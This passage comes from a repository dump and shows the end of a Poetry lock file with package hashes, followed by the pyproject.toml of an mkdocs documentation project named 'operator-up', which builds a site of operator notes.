"sha256:06fecd8ddb9cb90f30bcee2d94c3d4b46a090f403d7ff0edff089a435906c4ee"}, 496 | {file = "mkdocs_minify_plugin-0.3.0-py2-none-any.whl", hash = "sha256:9bac96276b1681debb3eb2cf5bae972586b4c1138e8d78ea63a984ea6276563d"}, 497 | ] 498 | packaging = [ 499 | {file = "packaging-21.3-py3-none-any.whl", hash = "sha256:ef103e05f519cdc783ae24ea4e2e0f508a9c99b2d4969652eed6a2e1ea5bd522"}, 500 | {file = "packaging-21.3.tar.gz", hash = "sha256:dd47c42927d89ab911e606518907cc2d3a1f38bbd026385970643f9c5b8ecfeb"}, 501 | ] 502 | pygments = [ 503 | {file = "Pygments-2.11.2-py3-none-any.whl", hash = "sha256:44238f1b60a76d78fc8ca0528ee429702aae011c265fe6a8dd8b63049ae41c65"}, 504 | {file = "Pygments-2.11.2.tar.gz", hash = "sha256:4e426f72023d88d03b2fa258de560726ce890ff3b630f88c21cbb8b2503b8c6a"}, 505 | ] 506 | pymdown-extensions = [ 507 | {file = "pymdown-extensions-9.2.tar.gz", hash = "sha256:ed8f69a18bc158f00cbf03abc536b88b6e541b7e699156501e767c48f81d8850"}, 508 | {file = "pymdown_extensions-9.2-py3-none-any.whl", hash = "sha256:f2fa7d9317c672a419868c893c20a28fb7ed7fc60d4ec4774c35e01398ab330c"}, 509 | ] 510 | pyparsing = [ 511 | {file = "pyparsing-3.0.7-py3-none-any.whl", hash = "sha256:a6c06a88f252e6c322f65faf8f418b16213b51bdfaece0524c1c1bc30c63c484"}, 512 | {file = "pyparsing-3.0.7.tar.gz", hash = "sha256:18ee9022775d270c55187733956460083db60b37d0d0fb357445f3094eed3eea"}, 513 | ] 514 | python-dateutil = [ 515 | {file = "python-dateutil-2.8.2.tar.gz", hash = "sha256:0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86"}, 516 | {file = "python_dateutil-2.8.2-py2.py3-none-any.whl", hash = "sha256:961d03dc3453ebbc59dbdea9e4e11c5651520a876d0f4db161e8674aae935da9"}, 517 | ] 518 | pytz = [ 519 | {file = "pytz-2021.3-py2.py3-none-any.whl", hash = "sha256:3672058bc3453457b622aab7a1c3bfd5ab0bdae451512f6cf25f64ed37f5b87c"}, 520 | {file = "pytz-2021.3.tar.gz", hash = "sha256:acad2d8b20a1af07d4e4c9d2e9285c5ed9104354062f275f3fcd88dcef4f1326"}, 521 | ] 522 | pyyaml = [ 523 | {file = "PyYAML-6.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d4db7c7aef085872ef65a8fd7d6d09a14ae91f691dec3e87ee5ee0539d516f53"}, 524 | {file = "PyYAML-6.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:9df7ed3b3d2e0ecfe09e14741b857df43adb5a3ddadc919a2d94fbdf78fea53c"}, 525 | {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:77f396e6ef4c73fdc33a9157446466f1cff553d979bd00ecb64385760c6babdc"}, 526 | {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a80a78046a72361de73f8f395f1f1e49f956c6be882eed58505a15f3e430962b"}, 527 | {file = "PyYAML-6.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:f84fbc98b019fef2ee9a1cb3ce93e3187a6df0b2538a651bfb890254ba9f90b5"}, 528 | {file = "PyYAML-6.0-cp310-cp310-win32.whl", hash = "sha256:2cd5df3de48857ed0544b34e2d40e9fac445930039f3cfe4bcc592a1f836d513"}, 529 | {file = "PyYAML-6.0-cp310-cp310-win_amd64.whl", hash = "sha256:daf496c58a8c52083df09b80c860005194014c3698698d1a57cbcfa182142a3a"}, 530 | {file = "PyYAML-6.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:897b80890765f037df3403d22bab41627ca8811ae55e9a722fd0392850ec4d86"}, 531 | {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:50602afada6d6cbfad699b0c7bb50d5ccffa7e46a3d738092afddc1f9758427f"}, 532 | {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:48c346915c114f5fdb3ead70312bd042a953a8ce5c7106d5bfb1a5254e47da92"}, 533 | {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:98c4d36e99714e55cfbaaee6dd5badbc9a1ec339ebfc3b1f52e293aee6bb71a4"}, 534 | {file = "PyYAML-6.0-cp36-cp36m-win32.whl", hash = "sha256:0283c35a6a9fbf047493e3a0ce8d79ef5030852c51e9d911a27badfde0605293"}, 535 | {file = "PyYAML-6.0-cp36-cp36m-win_amd64.whl", hash = "sha256:07751360502caac1c067a8132d150cf3d61339af5691fe9e87803040dbc5db57"}, 536 | {file = "PyYAML-6.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:819b3830a1543db06c4d4b865e70ded25be52a2e0631ccd2f6a47a2822f2fd7c"}, 537 | {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:473f9edb243cb1935ab5a084eb238d842fb8f404ed2193a915d1784b5a6b5fc0"}, 538 | {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0ce82d761c532fe4ec3f87fc45688bdd3a4c1dc5e0b4a19814b9009a29baefd4"}, 539 | {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:231710d57adfd809ef5d34183b8ed1eeae3f76459c18fb4a0b373ad56bedcdd9"}, 540 | {file = "PyYAML-6.0-cp37-cp37m-win32.whl", hash = "sha256:c5687b8d43cf58545ade1fe3e055f70eac7a5a1a0bf42824308d868289a95737"}, 541 | {file = "PyYAML-6.0-cp37-cp37m-win_amd64.whl", hash = "sha256:d15a181d1ecd0d4270dc32edb46f7cb7733c7c508857278d3d378d14d606db2d"}, 542 | {file = "PyYAML-6.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0b4624f379dab24d3725ffde76559cff63d9ec94e1736b556dacdfebe5ab6d4b"}, 543 | {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:213c60cd50106436cc818accf5baa1aba61c0189ff610f64f4a3e8c6726218ba"}, 544 | {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9fa600030013c4de8165339db93d182b9431076eb98eb40ee068700c9c813e34"}, 545 | {file = "PyYAML-6.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:277a0ef2981ca40581a47093e9e2d13b3f1fbbeffae064c1d21bfceba2030287"}, 546 | {file = "PyYAML-6.0-cp38-cp38-win32.whl", hash = "sha256:d4eccecf9adf6fbcc6861a38015c2a64f38b9d94838ac1810a9023a0609e1b78"}, 547 | {file = "PyYAML-6.0-cp38-cp38-win_amd64.whl", hash = "sha256:1e4747bc279b4f613a09eb64bba2ba602d8a6664c6ce6396a4d0cd413a50ce07"}, 548 | {file = "PyYAML-6.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:055d937d65826939cb044fc8c9b08889e8c743fdc6a32b33e2390f66013e449b"}, 549 | {file = "PyYAML-6.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:e61ceaab6f49fb8bdfaa0f92c4b57bcfbea54c09277b1b4f7ac376bfb7a7c174"}, 550 | {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d67d839ede4ed1b28a4e8909735fc992a923cdb84e618544973d7dfc71540803"}, 551 | {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:cba8c411ef271aa037d7357a2bc8f9ee8b58b9965831d9e51baf703280dc73d3"}, 552 | {file = "PyYAML-6.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:40527857252b61eacd1d9af500c3337ba8deb8fc298940291486c465c8b46ec0"}, 553 | {file = "PyYAML-6.0-cp39-cp39-win32.whl", hash = "sha256:b5b9eccad747aabaaffbc6064800670f0c297e52c12754eb1d976c57e4f74dcb"}, 554 | {file = "PyYAML-6.0-cp39-cp39-win_amd64.whl", hash = "sha256:b3d267842bf12586ba6c734f89d1f5b871df0273157918b0ccefa29deb05c21c"}, 555 | {file = "PyYAML-6.0.tar.gz", hash = "sha256:68fb519c14306fec9720a2a5b45bc9f0c8d1b9c72adf45c37baedfcd949c35a2"}, 556 | ] 557 | pyyaml-env-tag = [ 558 | {file = "pyyaml_env_tag-0.1-py3-none-any.whl", hash = "sha256:af31106dec8a4d68c60207c1886031cbf839b68aa7abccdb19868200532c2069"}, 559 | {file = "pyyaml_env_tag-0.1.tar.gz", hash = "sha256:70092675bda14fdec33b31ba77e7543de9ddc88f2e5b99160396572d11525bdb"}, 560 | ] 561 | six = [ 562 | {file = "six-1.16.0-py2.py3-none-any.whl", hash = "sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254"}, 563 | {file = "six-1.16.0.tar.gz", hash = "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926"}, 564 | ] 565 | smmap = [ 566 | {file = "smmap-5.0.0-py3-none-any.whl", hash = "sha256:2aba19d6a040e78d8b09de5c57e96207b09ed71d8e55ce0959eeee6c8e190d94"}, 567 | {file = "smmap-5.0.0.tar.gz", hash = "sha256:c840e62059cd3be204b0c9c9f74be2c09d5648eddd4580d9314c3ecde0b30936"}, 568 | ] 569 | typing-extensions = [ 570 | {file = "typing_extensions-4.1.1-py3-none-any.whl", hash = "sha256:21c85e0fe4b9a155d0799430b0ad741cdce7e359660ccbd8b530613e8df88ce2"}, 571 | {file = "typing_extensions-4.1.1.tar.gz", hash = "sha256:1a9462dcc3347a79b1f1c0271fbe79e844580bb598bafa1ed208b94da3cdcd42"}, 572 | ] 573 | watchdog = [ 574 | {file = "watchdog-2.1.6-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:9693f35162dc6208d10b10ddf0458cc09ad70c30ba689d9206e02cd836ce28a3"}, 575 | {file = "watchdog-2.1.6-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:aba5c812f8ee8a3ff3be51887ca2d55fb8e268439ed44110d3846e4229eb0e8b"}, 576 | {file = "watchdog-2.1.6-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:4ae38bf8ba6f39d5b83f78661273216e7db5b00f08be7592062cb1fc8b8ba542"}, 577 | {file = "watchdog-2.1.6-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:ad6f1796e37db2223d2a3f302f586f74c72c630b48a9872c1e7ae8e92e0ab669"}, 578 | {file = "watchdog-2.1.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:922a69fa533cb0c793b483becaaa0845f655151e7256ec73630a1b2e9ebcb660"}, 579 | {file = "watchdog-2.1.6-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:b2fcf9402fde2672545b139694284dc3b665fd1be660d73eca6805197ef776a3"}, 580 | {file = "watchdog-2.1.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:3386b367e950a11b0568062b70cc026c6f645428a698d33d39e013aaeda4cc04"}, 581 | {file = "watchdog-2.1.6-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:8f1c00aa35f504197561060ca4c21d3cc079ba29cf6dd2fe61024c70160c990b"}, 582 | {file = "watchdog-2.1.6-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:b52b88021b9541a60531142b0a451baca08d28b74a723d0c99b13c8c8d48d604"}, 583 | {file = "watchdog-2.1.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:8047da932432aa32c515ec1447ea79ce578d0559362ca3605f8e9568f844e3c6"}, 584 | {file = "watchdog-2.1.6-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:e92c2d33858c8f560671b448205a268096e17870dcf60a9bb3ac7bfbafb7f5f9"}, 585 | {file = "watchdog-2.1.6-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:b7d336912853d7b77f9b2c24eeed6a5065d0a0cc0d3b6a5a45ad6d1d05fb8cd8"}, 586 | {file = "watchdog-2.1.6-py3-none-manylinux2014_aarch64.whl", hash = "sha256:cca7741c0fcc765568350cb139e92b7f9f3c9a08c4f32591d18ab0a6ac9e71b6"}, 587 | {file = "watchdog-2.1.6-py3-none-manylinux2014_armv7l.whl", hash = "sha256:25fb5240b195d17de949588628fdf93032ebf163524ef08933db0ea1f99bd685"}, 588 | {file = "watchdog-2.1.6-py3-none-manylinux2014_i686.whl", hash = "sha256:be9be735f827820a06340dff2ddea1fb7234561fa5e6300a62fe7f54d40546a0"}, 589 | {file = "watchdog-2.1.6-py3-none-manylinux2014_ppc64.whl", hash = "sha256:d0d19fb2441947b58fbf91336638c2b9f4cc98e05e1045404d7a4cb7cddc7a65"}, 590 | {file = "watchdog-2.1.6-py3-none-manylinux2014_ppc64le.whl", hash = "sha256:3becdb380d8916c873ad512f1701f8a92ce79ec6978ffde92919fd18d41da7fb"}, 591 | {file = "watchdog-2.1.6-py3-none-manylinux2014_s390x.whl", hash = "sha256:ae67501c95606072aafa865b6ed47343ac6484472a2f95490ba151f6347acfc2"}, 592 | {file = "watchdog-2.1.6-py3-none-manylinux2014_x86_64.whl", hash = "sha256:e0f30db709c939cabf64a6dc5babb276e6d823fd84464ab916f9b9ba5623ca15"}, 593 | {file = "watchdog-2.1.6-py3-none-win32.whl", hash = "sha256:e02794ac791662a5eafc6ffeaf9bcc149035a0e48eb0a9d40a8feb4622605a3d"}, 594 | {file = "watchdog-2.1.6-py3-none-win_amd64.whl", hash = "sha256:bd9ba4f332cf57b2c1f698be0728c020399ef3040577cde2939f2e045b39c1e5"}, 595 | {file = "watchdog-2.1.6-py3-none-win_ia64.whl", hash = "sha256:a0f1c7edf116a12f7245be06120b1852275f9506a7d90227648b250755a03923"}, 596 | {file = "watchdog-2.1.6.tar.gz", hash = "sha256:a36e75df6c767cbf46f61a91c70b3ba71811dfa0aca4a324d9407a06a8b7a2e7"}, 597 | ] 598 | wcmatch = [ 599 | {file = "wcmatch-8.3-py3-none-any.whl", hash = "sha256:7141d2c85314253f16b38cb3d6cc0fb612918d407e1df3ccc2be7c86cc259c22"}, 600 | {file = "wcmatch-8.3.tar.gz", hash = "sha256:371072912398af61d1e4e78609e18801c6faecd3cb36c54c82556a60abc965db"}, 601 | ] 602 | zipp = [ 603 | {file = "zipp-3.7.0-py3-none-any.whl", hash = "sha256:b47250dd24f92b7dd6a0a8fc5244da14608f3ca90a5efcd37a3b1642fac9a375"}, 604 | {file = "zipp-3.7.0.tar.gz", hash = "sha256:9f50f446828eb9d45b267433fd3e9da8d801f614129124863f9c51ebceafb87d"}, 605 | ] 606 | -------------------------------------------------------------------------------- /pyproject.toml: -------------------------------------------------------------------------------- 1 | [tool.poetry] 2 | name = "operator-up" 3 | version = "0.1.0" 4 | description = "Helpful operator notes and techniques in actionable form" 5 | authors = ["Alexander Rymdeko-Harvey"] 6 | 7 | [tool.poetry.dependencies] 8 | python = "^3.7" 9 | mkdocs = "^1.2" 10 | mkdocs-material = "^5.1.5" 11 | mkdocs-minify-plugin = "^0.3.0" 12 | mkdocs-git-revision-date-localized-plugin = "^0.5.2" 13 | mkdocs-awesome-pages-plugin = "^2.2.1" 14 | 15 | [tool.poetry.dev-dependencies] 16 | 17 | [build-system] 18 | requires = ["poetry>=0.12"] 19 | build-backend = "poetry.masonry.api" 20 | --------------------------------------------------------------------------------